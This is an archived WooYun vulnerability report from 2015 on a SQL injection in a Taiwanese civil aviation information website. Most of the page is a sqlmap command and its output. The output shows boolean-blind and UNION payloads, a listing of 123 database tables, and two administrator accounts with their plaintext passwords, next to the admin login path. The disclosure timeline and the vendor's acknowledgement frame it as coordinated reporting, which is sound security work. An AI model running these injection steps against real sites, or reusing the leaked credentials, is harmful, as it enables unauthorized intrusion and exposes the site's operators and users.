乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-25: 细节已通知厂商并且等待厂商处理中 2015-10-27: 厂商已经确认,细节仅向厂商公开 2015-11-06: 细节向核心白帽子及相关领域专家公开 2015-11-16: 细节向普通白帽子公开 2015-11-26: 细节向实习白帽子公开 2015-12-11: 细节向公众公开
台湾民航资讯网某处存在SQL注射漏洞(123个表/管理明文密码泄露/可登录)
测试地址:http://**.**.**.**/company_detail.php?id=1
python sqlmap.py -u "http://**.**.**.**/company_detail.php?id=1" --random-agent -p id --technique=BU -D twairinfocom -T _users -C id,account,password,realname --dump
登陆地址:http://**.**.**.**/admin/_login.php
---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 2582=2582 Type: UNION query Title: MySQL UNION query (55) - 21 columns Payload: id=-1986 UNION ALL SELECT 55,55,55,55,55,55,55,55,55,55,55,55,55,CONCAT(0x71717a7671,0x666b7049624c5544745472464459635478646271667872794d54445069796477706c6d6e79666b42,0x717a706a71),55,55,55,55,55,55,55#---web application technology: Apacheback-end DBMS: MySQL >= 5.0.0current user: 'twairinfocom@%'current user is DBA: Falsedatabase management system users [1]:[*] 'twairinfocom'@'%'sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 2582=2582 Type: UNION query Title: MySQL UNION query (55) - 21 columns Payload: id=-1986 UNION ALL SELECT 55,55,55,55,55,55,55,55,55,55,55,55,55,CONCAT(0x71717a7671,0x666b7049624c5544745472464459635478646271667872794d54445069796477706c6d6e79666b42,0x717a706a71),55,55,55,55,55,55,55#---web application technology: Apacheback-end DBMS: MySQL 5available databases [2]:[*] information_schema[*] twairinfocomsqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 2582=2582 Type: UNION query Title: MySQL UNION query (55) - 21 columns Payload: id=-1986 UNION ALL SELECT 55,55,55,55,55,55,55,55,55,55,55,55,55,CONCAT(0x71717a7671,0x666b7049624c5544745472464459635478646271667872794d54445069796477706c6d6e79666b42,0x717a706a71),55,55,55,55,55,55,55#---web application technology: Apacheback-end DBMS: MySQL 5Database: twairinfocom[123 tables]+----------------------------+| _acl_group || _acl_user || _config || _content || _errorlog || _groups || _users || column || order || pad || ad || adbanner || aircompanyindex || airplainplace || airplaintime || airport || airportindex || album || album_reply || annals || blog || blog_album || blog_album_category || blog_album_reply || blog_article || blog_article_category || company || craft || craft_from || craft_iata || craft_note || craft_price || craft_reply || craft_stock || craft_stock_airplan || craft_user || cyclopedic || discuss || discusstype || dollartype || download || enewspaper || english || englishtype || exchange || freight || holiday || km || link || nation || news || p || phpbb_acl_groups || phpbb_acl_options || phpbb_acl_roles || phpbb_acl_roles_data || phpbb_acl_users || phpbb_attachments || phpbb_banlist || phpbb_bbcodes || phpbb_bookmarks || phpbb_bots || phpbb_config || phpbb_confirm || phpbb_disallow || phpbb_drafts || phpbb_extension_groups || phpbb_extensions || phpbb_forums || phpbb_forums_access || phpbb_forums_track || phpbb_forums_watch || phpbb_groups || phpbb_icons || phpbb_lang || phpbb_log || phpbb_moderator_cache || phpbb_modules || phpbb_poll_options || phpbb_poll_votes || phpbb_posts || phpbb_privmsgs || phpbb_privmsgs_folder || phpbb_privmsgs_rules || phpbb_privmsgs_to || phpbb_profile_fields || phpbb_profile_fields_data || phpbb_profile_fields_lang || phpbb_profile_lang || phpbb_ranks || phpbb_reports || phpbb_reports_reasons || phpbb_search_results || phpbb_search_wordlist || phpbb_search_wordmatch || phpbb_sessions || phpbb_sessions_keys || phpbb_sitelist || phpbb_smilies || phpbb_styles || phpbb_styles_imageset || phpbb_styles_imageset_data || phpbb_styles_template || phpbb_styles_template_data || phpbb_styles_theme || phpbb_topics || phpbb_topics_posted || phpbb_topics_track || phpbb_topics_watch || phpbb_user_group || phpbb_users || phpbb_warnings || phpbb_words || phpbb_zebra || ptype || rediscuss || sail || sample || stock_company || vote || voterecord || wanted || zipcode |+----------------------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 2582=2582 Type: UNION query Title: MySQL UNION query (55) - 21 columns Payload: id=-1986 UNION ALL SELECT 55,55,55,55,55,55,55,55,55,55,55,55,55,CONCAT(0x71717a7671,0x666b7049624c5544745472464459635478646271667872794d54445069796477706c6d6e79666b42,0x717a706a71),55,55,55,55,55,55,55#---web application technology: Apacheback-end DBMS: MySQL 5Database: twairinfocomTable: _users[5 columns]+----------+---------------------+| Column | Type |+----------+---------------------+| account | varchar(30) || group_id | int(10) unsigned || id | bigint(20) unsigned || password | varchar(30) || realname | varchar(30) |+----------+---------------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 2582=2582 Type: UNION query Title: MySQL UNION query (55) - 21 columns Payload: id=-1986 UNION ALL SELECT 55,55,55,55,55,55,55,55,55,55,55,55,55,CONCAT(0x71717a7671,0x666b7049624c5544745472464459635478646271667872794d54445069796477706c6d6e79666b42,0x717a706a71),55,55,55,55,55,55,55#---web application technology: Apacheback-end DBMS: MySQL 5Database: twairinfocomTable: _users[2 entries]+----+-----------+-------------------+----------+| id | account | password | realname |+----+-----------+-------------------+----------+| 1 | admin | KATY1130MAGIC0911 | 最高管理者 || 24 | magic-tpe | ijnb7557 | magic |+----+-----------+-------------------+----------+
增加过滤。
危害等级:高
漏洞Rank:15
确认时间:2015-10-27 00:10
感謝通報
暂无